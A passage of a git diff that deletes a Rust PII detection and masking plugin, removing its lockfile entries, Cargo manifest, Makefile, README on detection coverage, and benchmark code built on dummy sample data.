"tinytemplate" -version = "1.2.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "be4d6b5f19ff7664e8c98d03e2139cb510db9b0a60b55f8e8709b689d939b6bc" -dependencies = [ - "serde", - "serde_json", -] - -[[package]] -name = "toml" -version = "1.0.3+spec-1.1.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c7614eaf19ad818347db24addfa201729cf2a9b6fdfd9eb0ab870fcacc606c0c" -dependencies = [ - "indexmap", - "serde_core", - "serde_spanned", - "toml_datetime", - "toml_parser", - "toml_writer", - "winnow", -] - -[[package]] -name = "toml_datetime" -version = "1.0.0+spec-1.1.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "32c2555c699578a4f59f0cc68e5116c8d7cabbd45e1409b989d4be085b53f13e" -dependencies = [ - "serde_core", -] - -[[package]] -name = "toml_parser" -version = "1.0.9+spec-1.1.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "702d4415e08923e7e1ef96cd5727c0dfed80b4d2fa25db9647fe5eb6f7c5a4c4" -dependencies = [ - "winnow", -] - -[[package]] -name = "toml_writer" -version = "1.0.6+spec-1.1.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ab16f14aed21ee8bfd8ec22513f7287cd4a91aa92e44edfe2c17ddd004e92607" - -[[package]] -name = "typenum" -version = "1.19.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "562d481066bde0658276a35467c4af00bdc6ee726305698a55b86e61d7ad82bb" - -[[package]] -name = "unic-char-property" -version = "0.9.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a8c57a407d9b6fa02b4795eb81c5b6652060a15a7903ea981f3d723e6c0be221" -dependencies = [ - "unic-char-range", -] - -[[package]] -name = "unic-char-range" -version = "0.9.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "0398022d5f700414f6b899e10b8348231abf9173fa93144cbc1a43b9793c1fbc" - -[[package]] -name = "unic-common" -version = "0.9.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "80d7ff825a6a654ee85a63e80f92f054f904f21e7d12da4e22f9834a4aaa35bc" - -[[package]] -name = "unic-emoji-char" -version = "0.9.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "0b07221e68897210270a38bde4babb655869637af0f69407f96053a34f76494d" -dependencies = [ - "unic-char-property", - "unic-char-range", - "unic-ucd-version", -] - -[[package]] -name = "unic-ucd-ident" -version = "0.9.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e230a37c0381caa9219d67cf063aa3a375ffed5bf541a452db16e744bdab6987" -dependencies = [ - "unic-char-property", - "unic-char-range", - "unic-ucd-version", -] - -[[package]] -name = "unic-ucd-version" -version = "0.9.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "96bd2f2237fe450fcd0a1d2f5f4e91711124f7857ba2e964247776ebeeb7b0c4" -dependencies = [ - "unic-common", -] - -[[package]] -name = "unicode-ident" -version = "1.0.23" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "537dd038a89878be9b64dd4bd1b260315c1bb94f4d784956b81e27a088d9a09e" - -[[package]] -name = "unicode-width" -version = "0.2.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b4ac048d71ede7ee76d585517add45da530660ef4390e49b098733c6e897f254" - -[[package]] -name = "unicode_names2" -version = "1.3.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d1673eca9782c84de5f81b82e4109dcfb3611c8ba0d52930ec4a9478f547b2dd" -dependencies = [ - "phf", - "unicode_names2_generator", -] - -[[package]] -name = "unicode_names2_generator" -version = "1.3.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b91e5b84611016120197efd7dc93ef76774f4e084cd73c9fb3ea4a86c570c56e" -dependencies = [ - "getopts", - "log", - "phf_codegen", - "rand", -] - -[[package]] -name = "uuid" -version = "1.20.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ee48d38b119b0cd71fe4141b30f5ba9c7c5d9f4e7a3a8b4a674e4b6ef789976f" -dependencies = [ - "getrandom 0.3.4", - "js-sys", - "wasm-bindgen", -] - -[[package]] -name = "version_check" -version = "0.9.5" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "0b928f33d975fc6ad9f86c8f283853ad26bdd5b10b7f1542aa2fa15e2289105a" - -[[package]] -name = "walkdir" -version = "2.5.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "29790946404f91d9c5d06f9874efddea1dc06c5efe94541a7d6863108e3a5e4b" -dependencies = [ - "same-file", - "winapi-util", -] - -[[package]] -name = "wasi" -version = "0.11.1+wasi-snapshot-preview1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ccf3ec651a847eb01de73ccad15eb7d99f80485de043efb2f370cd654f4ea44b" - -[[package]] -name = "wasip2" -version = "1.0.2+wasi-0.2.9" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "9517f9239f02c069db75e65f174b3da828fe5f5b945c4dd26bd25d89c03ebcf5" -dependencies = [ - "wit-bindgen", -] - -[[package]] -name = "wasm-bindgen" -version = "0.2.108" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "64024a30ec1e37399cf85a7ffefebdb72205ca1c972291c51512360d90bd8566" -dependencies = [ - "cfg-if", - "once_cell", - "rustversion", - "wasm-bindgen-macro", - "wasm-bindgen-shared", -] - -[[package]] -name = "wasm-bindgen-macro" -version = "0.2.108" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "008b239d9c740232e71bd39e8ef6429d27097518b6b30bdf9086833bd5b6d608" -dependencies = [ - "quote", - "wasm-bindgen-macro-support", -] - -[[package]] -name = "wasm-bindgen-macro-support" -version = "0.2.108" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5256bae2d58f54820e6490f9839c49780dff84c65aeab9e772f15d5f0e913a55" -dependencies = [ - "bumpalo", - "proc-macro2", - "quote", - "syn", - "wasm-bindgen-shared", -] - -[[package]] -name = "wasm-bindgen-shared" -version = "0.2.108" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "1f01b580c9ac74c8d8f0c0e4afb04eeef2acf145458e52c03845ee9cd23e3d12" -dependencies = [ - "unicode-ident", -] - -[[package]] -name = "web-sys" -version = "0.3.85" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "312e32e551d92129218ea9a2452120f4aabc03529ef03e4d0d82fb2780608598" -dependencies = [ - "js-sys", - "wasm-bindgen", -] - -[[package]] -name = "winapi" -version = "0.3.9" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5c839a674fcd7a98952e593242ea400abe93992746761e38641405d28b00f419" -dependencies = [ - "winapi-i686-pc-windows-gnu", - "winapi-x86_64-pc-windows-gnu", -] - -[[package]] -name = "winapi-i686-pc-windows-gnu" -version = "0.4.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ac3b87c63620426dd9b991e5ce0329eff545bccbbb34f3be09ff6fb6ab51b7b6" - -[[package]] -name = "winapi-util" -version = "0.1.11" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c2a7b1c03c876122aa43f3020e6c3c3ee5c05081c9a00739faf7503aeba10d22" -dependencies = [ - "windows-sys", -] - -[[package]] -name = "winapi-x86_64-pc-windows-gnu" -version = "0.4.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "712e227841d057c1ee1cd2fb22fa7e5a5461ae8e48fa2ca79ec42cfc1931183f" - -[[package]] -name = "windows-core" -version = "0.62.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b8e83a14d34d0623b51dce9581199302a221863196a1dde71a7663a4c2be9deb" -dependencies = [ - "windows-implement", - "windows-interface", - "windows-link", - "windows-result", - "windows-strings", -] - -[[package]] -name = "windows-implement" -version = "0.60.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "053e2e040ab57b9dc951b72c264860db7eb3b0200ba345b4e4c3b14f67855ddf" -dependencies = [ - "proc-macro2", - "quote", - "syn", -] - -[[package]] -name = "windows-interface" -version = "0.59.3" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "3f316c4a2570ba26bbec722032c4099d8c8bc095efccdc15688708623367e358" -dependencies = [ - "proc-macro2", - "quote", - "syn", -] - -[[package]] -name = "windows-link" -version = "0.2.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f0805222e57f7521d6a62e36fa9163bc891acd422f971defe97d64e70d0a4fe5" - -[[package]] -name = "windows-result" -version = "0.4.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7781fa89eaf60850ac3d2da7af8e5242a5ea78d1a11c49bf2910bb5a73853eb5" -dependencies = [ - "windows-link", -] - -[[package]] -name = "windows-strings" -version = "0.5.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7837d08f69c77cf6b07689544538e017c1bfcf57e34b4c0ff58e6c2cd3b37091" -dependencies = [ - "windows-link", -] - -[[package]] -name = "windows-sys" -version = "0.61.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ae137229bcbd6cdf0f7b80a31df61766145077ddf49416a728b02cb3921ff3fc" -dependencies = [ - "windows-link", -] - -[[package]] -name = "winnow" -version = "0.7.14" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5a5364e9d77fcdeeaa6062ced926ee3381faa2ee02d3eb83a5c27a8825540829" - -[[package]] -name = "wit-bindgen" -version = "0.51.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d7249219f66ced02969388cf2bb044a09756a083d0fab1e566056b04d9fbcaa5" - -[[package]] -name = "zerocopy" -version = "0.8.39" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "db6d35d663eadb6c932438e763b262fe1a70987f9ae936e60158176d710cae4a" -dependencies = [ - "zerocopy-derive", -] - -[[package]] -name = "zerocopy-derive" -version = "0.8.39" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "4122cd3169e94605190e77839c9a40d40ed048d305bfdc146e7df40ab0f3e517" -dependencies = [ - "proc-macro2", - "quote", - "syn", -] - -[[package]] -name = "zmij" -version = "1.0.21" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b8848ee67ecc8aedbaf3e4122217aff892639231befc6a1b58d29fff4c2cabaa" diff --git a/plugins_rust/pii_filter/Cargo.toml b/plugins_rust/pii_filter/Cargo.toml deleted file mode 100644 index c85dc4df02..0000000000 --- a/plugins_rust/pii_filter/Cargo.toml +++ /dev/null @@ -1,44 +0,0 @@ -[package] -name = "pii_filter" -version = "1.0.0-RC-2" -edition = "2024" -authors = ["ContextForge Contributors"] -license = "Apache-2.0" -repository = "https://github.com/IBM/mcp-context-forge" -description = "High-performance PII detection and masking library" - -[lib] -name = "pii_filter_rust" -crate-type = ["cdylib", "rlib"] - -[[bin]] -name = "stub_gen" -path = "src/bin/stub_gen.rs" - -[dependencies] -pyo3 = { version = "0.28.2", features = ["abi3-py311"] } -pyo3-stub-gen = "0.19" -regex = "1.12" -once_cell = "1.21" -serde = { version = "1.0", features = ["derive"] } -serde_json = "1.0" -thiserror = "2.0" -sha2 = "0.10" -uuid = { version = "1.18", features = ["v4"] } - -[dev-dependencies] -criterion = { version = "0.8", features = ["html_reports"] } - -[[bench]] -name = "pii_filter" -harness = false - -[profile.release] -opt-level = 3 -lto = "fat" -codegen-units = 1 -strip = true - -[profile.bench] -inherits = "release" -debug = true diff --git a/plugins_rust/pii_filter/Makefile b/plugins_rust/pii_filter/Makefile deleted file mode 100644 index b7c700ca10..0000000000 --- a/plugins_rust/pii_filter/Makefile +++ /dev/null @@ -1,216 +0,0 @@ -# ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ -# 🦀 PII-FILTER - Makefile -# High-performance PII detection and masking library (Rust + Python) -# ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ -# -# Usage: make or just `make help` -# -# help: 🦀 PII-FILTER (Rust + Python extension build & automation) -# ───────────────────────────────────────────────────────────────────────── - -# ============================================================================= -# 📖 DYNAMIC HELP -# ============================================================================= -.PHONY: help -help: - @grep '^# help\:' $(firstword $(MAKEFILE_LIST)) | sed 's/^# help\: //' - -# ============================================================================= -# 📦 PROJECT METADATA -# ============================================================================= -PACKAGE_NAME := pii_filter -VERSION ?= $(shell cargo metadata --format-version 1 --no-deps 2>/dev/null | jq -r '.packages[0].version' || echo "1.0.0-RC-1") -DIST_DIR := target -PYTHON ?= python3 - -# Colors for output -BLUE := \033[0;34m -GREEN := \033[0;32m -YELLOW := \033[0;33m -RED := \033[0;31m -NC := \033[0m # No Color - -# Legacy color names for compatibility -ifeq ($(shell test -t 1 && echo tty),tty) -C_BLUE := \033[38;5;75m -C_GREEN := \033[38;5;82m -C_RESET := \033[0m -else -C_BLUE := -C_GREEN := -C_RESET := -endif - -# ============================================================================= -# 🔍 LINTING & FORMAT -# ============================================================================= -# help: 🔍 LINTING & FORMAT -# help: fmt - Format Rust code with rustfmt -# help: fmt-check - Check Rust code formatting (CI) -# help: clippy - Run clippy lints -# help: cargo-check - Run cargo check -.PHONY: fmt fmt-check clippy cargo-check build-target - -fmt: - @echo "$(GREEN)Formatting code...$(NC)" - cargo fmt - -fmt-check: - @echo "$(GREEN)Checking code format...$(NC)" - cargo fmt -- --check - -clippy: - @echo "$(GREEN)Running clippy...$(NC)" - cargo clippy -- -D warnings - -cargo-check: - @cargo check - -# ============================================================================= -# 🧪 TESTS -# ============================================================================= -# help: 🧪 TESTS -# help: test - Run Rust unit tests -# help: test-verbose - Run Rust tests with verbose output -# help: test-python - Run Python integration tests -# help: test-all - Run both Rust and Python tests -.PHONY: test test-verbose test-python test-all - -test: - @echo "$(GREEN)Running pii_filter tests...$(NC)" - cargo test - -test-verbose: - @echo "$(GREEN)Running pii_filter tests (verbose)...$(NC)" - cargo test -- --nocapture - -test-python: ## Run Python unit tests for plugin (requires dev install) - @echo "$(GREEN)Running Python unit tests...$(NC)" - cd ../.. && uv run pytest -k pii_filter -v - -test-all: test test-python - -# ============================================================================= -# 🛠 BUILD (maturin for Python extension) -# ============================================================================= -# help: 🛠 BUILD -# help: stub-gen - Generate Python type stubs (.pyi files) -# help: build - Build release extension (no install) -# help: build-target - Build for specific target (use TARGET=...) -# help: install - Build and install wheel -.PHONY: stub-gen build build-target install - -stub-gen: - @echo "$(GREEN)Generating Python type stubs...$(NC)" - @cargo run --bin stub_gen - @echo "$(GREEN)Type stubs generated$(NC)" - -build: stub-gen - @echo "$(GREEN)Building $(PACKAGE_NAME)...$(NC)" - @cd ../.. && uv run maturin build --release --manifest-path plugins_rust/pii_filter/Cargo.toml - @echo "$(GREEN)Build complete$(NC)" - -build-target: stub-gen - @echo "$(GREEN)Building for target: $(TARGET)...$(NC)" - @uv run maturin build --release --target $(TARGET) - @echo "$(GREEN)Build complete for $(TARGET)$(NC)" - - -install: stub-gen - @echo "$(GREEN)Installing $(PACKAGE_NAME) plugin...$(NC)" - @cd ../.. && uv run maturin develop --release --manifest-path plugins_rust/pii_filter/Cargo.toml - @echo "$(GREEN)Installation complete$(NC)" - -# ============================================================================= -# 📊 BENCHMARKS -# ============================================================================= -# help: 📊 BENCHMARKS -# help: bench - Run Criterion benchmarks -# help: bench-baseline - Save benchmark baseline -# help: bench-compare - Compare against baseline -.PHONY: bench bench-baseline bench-compare compare - -bench: - @echo "$(GREEN)Running benchmarks...$(NC)" - @cargo bench - -bench-baseline: - @echo "$(GREEN)Running benchmarks...$(NC)" - @cargo bench - -bench-compare: - @echo "$(GREEN)Running benchmarks...$(NC)" - @cargo bench - -compare: install ## Run performance comparison (skip benchmarks) - @echo "$(GREEN)Running performance comparison...$(NC)" - @echo "$(YELLOW)Note: This plugin doesn't have a compare_performance.py script yet$(NC)" - -# ============================================================================= -# 🧹 CLEANUP -# ============================================================================= -# help: 🧹 CLEANUP -# help: clean - Remove build artifacts -# help: clean-all - Remove all build artifacts including wheels -# help: uninstall - Uninstall plugin from Python environment -.PHONY: clean clean-all uninstall - -uninstall: - @echo "$(YELLOW)Uninstalling $(PACKAGE_NAME)...$(NC)" - @uv pip uninstall -y $(PACKAGE_NAME) 2>/dev/null || pip uninstall -y $(PACKAGE_NAME) 2>/dev/null || true - @echo "$(GREEN)$(PACKAGE_NAME) uninstalled$(NC)" - -clean: - @echo "$(YELLOW)Cleaning build artifacts...$(NC)" - cargo clean - rm -rf target/ - rm -rf coverage/ - find . -type f -name "*.whl" -delete - find . -type f -name "*.pyc" -delete - find . -type d -name "__pycache__" -exec rm -rf {} + 2>/dev/null || true - -clean-all: clean - @echo "$(RED)Cleaning all generated files...$(NC)" - rm -rf ~/.cargo/registry/cache/ - rm -rf ~/.cargo/git/db/ - -# ============================================================================= -# 📚 DOCUMENTATION -# ============================================================================= -# help: 📚 DOCUMENTATION -# help: doc - Generate Rust documentation -# help: doc-open - Generate and open documentation -.PHONY: doc doc-open - -doc: - @echo "$(GREEN)Building documentation...$(NC)" - cargo doc --no-deps --document-private-items - -doc-open: doc - @echo "$(GREEN)Opening documentation...$(NC)" - cargo doc --no-deps --document-private-items --open - -# ============================================================================= -# � DEVELOPMENT HELPERS -# ============================================================================= -# help: 🔧 DEVELOPMENT HELPERS -# help: verify - Verify plugin installation -# help: check-all - Run all checks (fmt, clippy, test) -# help: test-integration - Run integration tests -# help: pre-commit - Run pre-commit checks -.PHONY: verify check-all test-integration pre-commit - -verify: - @echo "$(GREEN)Verifying pii_filter installation...$(NC)" - @uv run python -c "import pii_filter; print('✅ pii_filter available')" || echo "⚠️ pii_filter not installed" - -check-all: fmt-check clippy test - @echo "$(GREEN)✔ All checks passed$(NC)" - -pre-commit: check-all - @echo "$(GREEN)✔ Ready to commit$(NC)" - -# --------------------------------------------------------------------------- -# Default goal -# --------------------------------------------------------------------------- -.DEFAULT_GOAL := help diff --git a/plugins_rust/pii_filter/README.md b/plugins_rust/pii_filter/README.md deleted file mode 100644 index d2095e0eef..0000000000 --- a/plugins_rust/pii_filter/README.md +++ /dev/null @@ -1,194 +0,0 @@ -# PII Filter (Rust) - -High-performance PII detection and masking library for ContextForge. - -## Features - -- Detects 12+ PII types (SSN, email, credit cards, phone numbers, AWS keys, etc.) -- Multiple masking strategies (partial, hash, tokenize, remove) -- Parallel regex matching with RegexSet (5-10x faster than Python) -- Zero-copy operations for nested JSON/dict traversal -- Whitelist support for false positive filtering -- Deterministic overlap resolution: earliest match wins, then the longest match wins -- Structural validation for SSNs and common card issuer ranges to reduce false positives -- Explicit guardrails for oversized inputs and pathological custom patterns - -## Build - -```bash -make install -``` - -## Usage - -The Rust implementation is automatically used by the Python PII filter plugin when available. - -## Detection Coverage - -This section describes the current Rust detector behavior so users know what is intentionally matched and what is intentionally left alone. The detector is optimized to reduce noisy false positives, which means some generic identifiers are only matched when they appear with clear context labels. - -### Social Security Numbers (SSN) - -**Covers** -- Dashed US SSNs such as `123-45-6789` -- Compact 9-digit SSNs only when they appear with SSN-specific context such as `SSN`, `Social Security`, or `Social Security Number` -- Structural validation that rejects impossible values such as `000-12-3456`, `666-12-3456`, `123-00-4567`, and `123-45-0000` - -**Does not cover** -- Bare 9-digit values without SSN context -- Real-world identity verification or SSA-backed validation -- Country-specific national identifiers outside the US SSN patterns - -### BSN (Dutch Citizen Service Number) - -**Covers** -- 9-digit BSNs when they appear with explicit Dutch/BSN-style context such as `BSN`, `Citizen ID`, `Citizen Service Number`, or `Burgerservicenummer` -- Phrases such as `My BSN is 123456789` - -**Does not cover** -- Generic unlabeled 9-digit numbers -- Generic business identifiers such as order numbers, invoice numbers, or tracking numbers unless they also use BSN-specific wording -- Validation against authoritative Dutch registries - -### Credit Card Numbers - -**Covers** -- Common 13-19 digit card numbers with spaces or dashes -- Luhn-valid numbers from the major issuer families currently recognized by the detector, including Visa, Mastercard, American Express, Discover, Diners Club, JCB, UnionPay, and Maestro - -**Does not cover** -- Numbers that fail Luhn validation -- Arbitrary long digit strings that do not match a recognized card-prefix family -- Full issuer-specific business rules beyond prefix and Luhn checks - -### Email Addresses - -**Covers** -- Standard email addresses such as `alice@example.com` -- Partial masking that preserves enough structure for debugging, for example `a***e@example.com` - -**Does not cover** -- Full RFC-complete email parsing -- Mailbox ownership verification or domain reachability checks -- Obfuscated emails such as `alice at example dot com` - -### Phone Numbers - -**Covers** -- Common US phone number formats such as `555-123-4567`, `(555) 123-4567`, and `1 555 123 4567` -- International numbers with an explicit leading `+` and enough digits to look like an E.164-style value - -**Does not cover** -- Short local extensions or ambiguous local-only numbers -- International numbers without a leading `+` -- Country-by-country numbering-plan validation - -### IP Addresses - -**Covers** -- Standard IPv4 dotted-quad addresses -- Fully expanded IPv6 addresses in the eight-group hexadecimal form - -**Does not cover** -- Shorthand IPv6 forms such as `2001:db8::1` -- Hostnames, URLs, or CIDR ranges -- Private/public classification or network reachability checks - -### Dates of Birth - -**Covers** -- Explicitly labeled date-of-birth phrases such as `DOB: 01/15/1990` -- Unlabeled dates in `MM/DD/YYYY` or `MM-DD-YYYY` form within the configured year range - -**Does not cover** -- Locale-specific date parsing beyond the built-in patterns -- Natural-language dates such as `15 January 1990` -- Any proof that a matched date is actually a birth date when no DOB-style label is present - -### Passport Numbers - -**Covers** -- Passport identifiers only when they appear with explicit passport context such as `Passport`, `Passport No`, or `Passport Number` -- Label-plus-value matches such as `Passport Number: AB123456` - -**Does not cover** -- Standalone alphanumeric IDs without passport wording -- Country-specific passport validation rules -- Broader travel-document types that do not use passport labels - -### Driver's License Numbers - -**Covers** -- Driver's license values with explicit labels such as `DL`, `License`, or `Driver's License` - -**Does not cover** -- Unlabeled alphanumeric identifiers -- State-by-state or country-by-country license validation rules -- Vehicle registration numbers or other transport-related IDs - -### Bank Account Numbers - -**Covers** -- Account numbers when they appear with explicit account-style context such as `Account`, `Acct`, `Bank Account`, or `Account Number` -- IBAN-like values that match the built-in pattern - -**Does not cover** -- Bare 8-17 digit values without account context -- Full IBAN country validation or checksum verification -- Routing-number-only detection - -### Medical Record Numbers - -**Covers** -- Explicitly labeled medical record identifiers such as `MRN` or `Medical Record` - -**Does not cover** -- Unlabeled healthcare identifiers -- Insurance member IDs, prescription IDs, or other healthcare-adjacent identifiers unless added through custom patterns -- Validation against provider or hospital systems - -### Custom Patterns - -**Covers** -- User-defined regex patterns for organization-specific identifiers -- Explicit per-pattern masking strategies -- Guardrails that reject patterns that are too long or too complex for maintainable admin-authored configuration - -**Does not cover** -- Unlimited regex expressiveness -- Automatic tuning of custom patterns for precision or recall -- Protection against poor pattern choices that are syntactically valid but semantically too broad - -Custom patterns are intended for trusted operators editing plugin configuration, not untrusted end-user input. The Rust implementation relies on the [`regex`](https://docs.rs/regex/latest/regex/) crate, which avoids catastrophic backtracking during matching, and then applies additional length and complexity limits to keep custom expressions readable and cheap to compile. - -## Secret Detection - -The Rust plugin also detects AWS keys and generic API-key style assignments, but secret formats tend to be environment-specific and evolve quickly. Treat those detectors as best-effort safeguards rather than exhaustive secret scanning, and use dedicated secret-scanning tooling if you need stronger guarantees. - -## Security Notes - -- Whitelist patterns are compiled case-insensitively. -- Custom patterns must stay within basic length and complexity limits and are meant for trusted admin-authored configuration. -- Very large strings and oversized nested collections are rejected instead of being scanned indefinitely. - -## Masking Notes - -- `HASH` masking emits the first 16 hexadecimal characters of the SHA-256 digest, for example `[HASH:8f434346648f6b96]`. -- Earlier releases emitted 8 hexadecimal characters. Update downstream parsers if they assumed the shorter fixed-width placeholder. - -## Testing - -```bash -# Rust unit tests -make test - -# Python tests -make test-python - -# Benchmarks -make bench -``` - -## Performance - -Expected 5-10x speedup over Python implementation for typical payloads. diff --git a/plugins_rust/pii_filter/benches/pii_filter.rs b/plugins_rust/pii_filter/benches/pii_filter.rs deleted file mode 100644 index b7520b6eec..0000000000 --- a/plugins_rust/pii_filter/benches/pii_filter.rs +++ /dev/null @@ -1,319 +0,0 @@ -// Copyright 2025 -// SPDX-License-Identifier: Apache-2.0 -// -// Criterion benchmarks for PII filter performance - -use criterion::{BenchmarkId, Criterion, Throughput, criterion_group, criterion_main}; -use std::hint::black_box; -// Import the PII filter modules -use pii_filter_rust::{ - config::{MaskingStrategy, PIIConfig}, - detector::detect_pii, - masking::mask_pii, - patterns::compile_patterns, -}; - -fn create_test_config() -> PIIConfig { - PIIConfig { - detect_ssn: true, - detect_bsn: true, - detect_credit_card: true, - detect_email: true, - detect_phone: true, - detect_ip_address: true, - detect_date_of_birth: true, - detect_passport: true, - detect_driver_license: true, - detect_bank_account: true, - detect_medical_record: true, - default_mask_strategy: MaskingStrategy::Partial, - redaction_text: "[REDACTED]".to_string(), - block_on_detection: false, - log_detections: true, - include_detection_details: true, - custom_patterns: vec![], - whitelist_patterns: vec![], - ..Default::default() - } -} - -fn bench_pattern_compilation(c: &mut Criterion) { - let config = create_test_config(); - - c.bench_function("pattern_compilation", |b| { - b.iter(|| compile_patterns(black_box(&config))) - }); -} - -fn bench_single_ssn_detection(c: &mut Criterion) { - let config = create_test_config(); - let patterns = compile_patterns(&config).unwrap(); - let text = "My SSN is 123-45-6789"; - - c.bench_function("detect_single_ssn", |b| { - b.iter(|| detect_pii(black_box(text), black_box(&patterns), black_box(&config))) - }); -} - -fn bench_single_email_detection(c: &mut Criterion) { - let config = create_test_config(); - let patterns = compile_patterns(&config).unwrap(); - let text = "Contact me at john.doe@example.com for more info"; - - c.bench_function("detect_single_email", |b| { - b.iter(|| detect_pii(black_box(text), black_box(&patterns), black_box(&config))) - }); -} - -fn bench_multiple_pii_types(c: &mut Criterion) { - let config = create_test_config(); - let patterns = compile_patterns(&config).unwrap(); - let text = - "SSN: 123-45-6789, Email: john@example.com, Phone: (555) 123-4567, IP: 192.168.1.100"; - - c.bench_function("detect_multiple_types", |b| { - b.iter(|| detect_pii(black_box(text), black_box(&patterns), black_box(&config))) - }); -} - -fn bench_no_pii_detection(c: &mut Criterion) { - let config = create_test_config(); - let patterns = compile_patterns(&config).unwrap(); - let text = "This is just normal text without any sensitive information whatsoever. \ - It contains nothing that should be detected as PII. Just plain English text."; - - c.bench_function("detect_no_pii", |b| { - b.iter(|| detect_pii(black_box(text), black_box(&patterns), black_box(&config))) - }); -} - -fn bench_masking_ssn(c: &mut Criterion) { - let config = create_test_config(); - let patterns = compile_patterns(&config).unwrap(); - let text = "SSN: 123-45-6789"; - let detections = detect_pii(text, &patterns, &config); - - c.bench_function("mask_ssn", |b| { - b.iter(|| mask_pii(black_box(text), black_box(&detections), black_box(&config))) - }); -} - -fn bench_masking_multiple(c: &mut Criterion) { - let config = create_test_config(); - let patterns = compile_patterns(&config).unwrap(); - let text = "SSN: 123-45-6789, Email: test@example.com, Phone: 555-1234"; - let detections = detect_pii(text, &patterns, &config); - - c.bench_function("mask_multiple_types", |b| { - b.iter(|| mask_pii(black_box(text), black_box(&detections), black_box(&config))) - }); -} - -fn bench_large_text_detection(c: &mut Criterion) { - let mut group = c.benchmark_group("large_text_detection"); - - let config = create_test_config(); - let patterns = compile_patterns(&config).unwrap(); - - for size in [100, 500, 1000, 5000].iter() { - // Generate text with N PII instances - let mut text = String::new(); - for i in 0..*size { - text.push_str(&format!( - "User {}: SSN {:03}-45-6789, Email user{}@example.com, Phone: (555) {:03}-{:04}\n", - i, - i % 1000, - i, - i % 1000, - i % 10000 - )); - } - - group.throughput(Throughput::Bytes(text.len() as u64)); - group.bench_with_input(BenchmarkId::from_parameter(size), &text, |b, text| { - b.iter(|| detect_pii(black_box(text), black_box(&patterns), black_box(&config))) - }); - } - - group.finish(); -} - -fn bench_parallel_regex_matching(c: &mut Criterion) { - let config = create_test_config(); - let patterns = compile_patterns(&config).unwrap(); - - // Text with multiple PII types to test RegexSet parallelism - let text = "User details: SSN 123-45-6789, Email john@example.com, \ - Phone (555) 123-4567, Credit Card 4111-1111-1111-1111, \ - IP 192.168.1.100, \ - DOB 01/15/1990, Passport AB1234567"; - - c.bench_function("parallel_regex_set", |b| { - b.iter(|| detect_pii(black_box(text), black_box(&patterns), black_box(&config))) - }); -} - -fn bench_nested_structure_traversal(c: &mut Criterion) { - // Note: This is a simplified benchmark for the traversal logic - // Full nested structure benchmarks would require PyO3 integration - let config = create_test_config(); - let patterns = compile_patterns(&config).unwrap(); - - let text_samples = vec![ - "SSN: 123-45-6789", - "Email: user@example.com", - "Phone: 555-1234", - "No PII here", - "Credit card: 4111-1111-1111-1111", - ]; - - c.bench_function("traverse_list_items", |b| { - b.iter(|| { - for text in &text_samples { - let _ = detect_pii(black_box(text), black_box(&patterns), black_box(&config)); - } - }) - }); -} - -fn bench_whitelist_checking(c: &mut Criterion) { - let mut config = create_test_config(); - config.whitelist_patterns = vec!["test@example\\.com".to_string()]; - - let patterns = compile_patterns(&config).unwrap(); - let text = "Email1: test@example.com, Email2: john@example.com"; - - c.bench_function("whitelist_filtering", |b| { - b.iter(|| detect_pii(black_box(text), black_box(&patterns), black_box(&config))) - }); -} - -fn bench_different_masking_strategies(c: &mut Criterion) { - let mut group = c.benchmark_group("masking_strategies"); - - let base_config = create_test_config(); - let patterns = compile_patterns(&base_config).unwrap(); - let text = "SSN: 123-45-6789, Email: john@example.com"; - let detections = detect_pii(text, &patterns, &base_config); - - let strategies = [ - MaskingStrategy::Partial, - MaskingStrategy::Redact, - MaskingStrategy::Hash, - MaskingStrategy::Tokenize, - MaskingStrategy::Remove, - ]; - - for strategy in strategies.iter() { - let mut config = base_config.clone(); - config.default_mask_strategy = *strategy; - - group.bench_with_input( - BenchmarkId::new("strategy", format!("{:?}", strategy)), - strategy, - 